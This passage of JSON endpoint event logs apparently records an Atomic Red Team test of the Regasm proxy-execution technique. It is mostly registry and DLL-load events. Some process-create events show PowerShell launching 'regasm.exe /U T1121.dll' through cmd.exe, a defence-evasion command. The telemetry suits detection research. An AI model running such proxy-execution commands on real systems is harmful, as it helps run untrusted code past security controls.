"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcr120_clr0400.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "subtype": "terminate", - "timestamp": 131883570861360000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6712, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5012, - "ppid": 6712, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "subtype": "create", - "timestamp": 131883570861830000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}", - "unique_ppid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 